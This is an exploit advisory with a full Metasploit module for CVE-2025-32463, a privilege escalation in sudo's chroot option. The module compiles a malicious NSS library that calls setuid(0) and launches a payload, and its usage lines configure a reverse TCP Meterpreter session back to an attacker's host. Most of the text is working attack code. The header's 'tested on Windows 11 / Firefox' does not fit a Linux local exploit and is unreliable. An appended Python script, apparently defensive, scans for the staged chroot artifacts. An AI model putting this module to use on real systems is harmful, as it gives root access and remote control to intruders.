=============================================================================================================================================
| # Title : sudo 1.9.17 Sudo Chroot Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================
[+] Summary :
This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality.
The vulnerability allows a local attacker to make sudo load a malicious NSS (Name Service Switch) module from an attacker-controlled chroot directory, which results in arbitrary code execution as root.
[+] Integration Methods :
1. **Standalone Exploit Module**
- Custom Ruby module for direct exploitation
- Automated chroot environment setup
- Payload execution as root
2. **Payload Integration**
- Modified NSS module with Meterpreter payload
- Reverse TCP connection establishment
- Root-level Meterpreter session
3. **Multi-Handler Approach**
- External exploit triggering Meterpreter
- Payload delivery via HTTP/SMB
- Session management through handler
[+] Module Components :
**Core Functions:**
- `check()`: Verifies sudo chroot capability
- `exploit()`: Main exploitation routine
- `generate_nss_module()`: Creates malicious NSS library
- `compile_nss_module()`: Compiles shared object
**Exploitation Flow:**
1. Vulnerability verification
2. Chroot environment creation
3. Malicious NSS module generation
4. Payload integration
5. Privilege escalation trigger
6. Meterpreter session establishment
[+] Usage :
use exploit/linux/local/sudo_chroot_priv_esc
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit
or
save as : sudo_chroot_exploit.rb
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
[+] POC :
##
# Module for CVE-2025-32463 Sudo Chroot Privilege Escalation
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)',
'Description' => %q{
This module exploits CVE-2025-32463, a privilege escalation vulnerability
in sudo's chroot functionality that allows loading malicious NSS modules.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'References' => [
['CVE', '2025-32463']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'PrependSetuid' => true
},
'DisclosureDate' => '2025-11-26',
'DefaultTarget' => 0
))
register_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
])
end
def check
if command_exists?('sudo')
check_cmd = 'sudo -n -l | grep -i chroot'
result = cmd_exec(check_cmd)
if result =~ /chroot/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def exploit
working_dir = "#{datastore['WritableDir']}/.chroot_exploit"
cmd_exec("mkdir -p #{working_dir}/#{working_dir}/{lib,etc,bin}")
nss_payload = generate_nss_module
nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n"
write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf)
if compile_nss_module(working_dir, nss_payload)
print_status("Malicious NSS module compiled successfully")
print_status("Triggering privilege escalation...")
cmd_exec("sudo -R #{working_dir} /bin/id")
whoami = cmd_exec('whoami')
if whoami =~ /root/
print_good("Successfully obtained root privileges!")
print_status("Executing payload as root...")
cmd_exec("/bin/bash -c \"#{payload.encoded}\"")
else
print_error("Privilege escalation failed")
end
else
print_error("Failed to compile NSS module")
end
cmd_exec("rm -rf #{working_dir}")
end
def generate_nss_module
payload_file = "/tmp/.msf_payload"
write_file(payload_file, payload.encoded)
cmd_exec("chmod +x #{payload_file}")
nss_code = %Q{
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>
__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("#{payload_file} &");
system("rm -f #{payload_file}");
}
enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
char *buf, size_t buflen, int *errnop) {
return NSS_STATUS_NOTFOUND;
}
}
return nss_code
end
def compile_nss_module(working_dir, source_code)
source_file = "#{working_dir}/payload.c"
output_file = "#{working_dir}/lib/libnss_Xfiles.so.2"
write_file(source_file, source_code)
compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles"
result = cmd_exec(compile_cmd)
# Cleanup source
cmd_exec("rm -f #{source_file}")
return file_exist?(output_file)
end
def command_exists?(cmd)
result = cmd_exec("which #{cmd}")
return result.include?('/')
end
end
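A defensive hunt for the artifacts the module above stages, as an added example that is not part of the original advisory or of sudo: it walks a directory and reports any tree that carries its own etc/nsswitch.conf naming a non-standard NSS source together with the matching libnss_<source>.so.2 (here "passwd: Xfiles" and lib/libnss_Xfiles.so.2). The KNOWN_SOURCES allowlist, the LIB_DIRS list and all function names are assumptions of this example, and the sample trees are constructed.

```python
import os
import re
import tempfile
# Assumed allowlist of NSS sources and library directories; extend both per fleet.
KNOWN_SOURCES = set("files compat db dns nis nisplus hesiod systemd sss ldap winbind wins "
                    "resolve myhostname mymachines mdns mdns4 mdns_minimal mdns4_minimal".split())
LIB_DIRS = ("lib", "lib64", "usr/lib", "usr/lib64")

def nss_sources(conf_text):
    """Parse nsswitch.conf text into {database: [source, ...]}."""
    parsed = {}
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        database, rest = line.split(":", 1)
        parsed[database.strip()] = re.sub(r"\[[^\]]*\]", " ", rest).split()  # drop [NOTFOUND=return] actions
    return parsed

def find_fake_roots(base):
    """Return (root, database, source, module) for trees that ship their own NSS module."""
    findings = []
    for root, _dirs, _files in os.walk(base):
        conf = os.path.join(root, "etc", "nsswitch.conf")
        if not os.path.isfile(conf):
            continue
        with open(conf, errors="replace") as fh:
            sources = nss_sources(fh.read())
        for database, names in sorted(sources.items()):
            for name in (n for n in names if n not in KNOWN_SOURCES):
                for lib_dir in LIB_DIRS:
                    module = os.path.join(root, lib_dir, f"libnss_{name}.so.2")
                    if os.path.isfile(module):
                        findings.append((root, database, name, module))
    return findings

def build_sample(base):
    """Constructed input: one tree laid out like the module's working directory, one benign."""
    for name, source in (("suspect", "Xfiles"), ("benign", "files")):
        os.makedirs(os.path.join(base, name, "etc"))
        os.makedirs(os.path.join(base, name, "lib"))
        with open(os.path.join(base, name, "etc", "nsswitch.conf"), "w") as fh:
            fh.write(f"passwd: {source}\ngroup: files\nshadow: files\n")
    open(os.path.join(base, "suspect", "lib", "libnss_Xfiles.so.2"), "w").close()  # empty placeholder

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(find_fake_roots(tmp))
```

Because the module removes its working directory when it finishes, this check is most useful against disk images, snapshots, or hosts where a run was interrupted.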
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================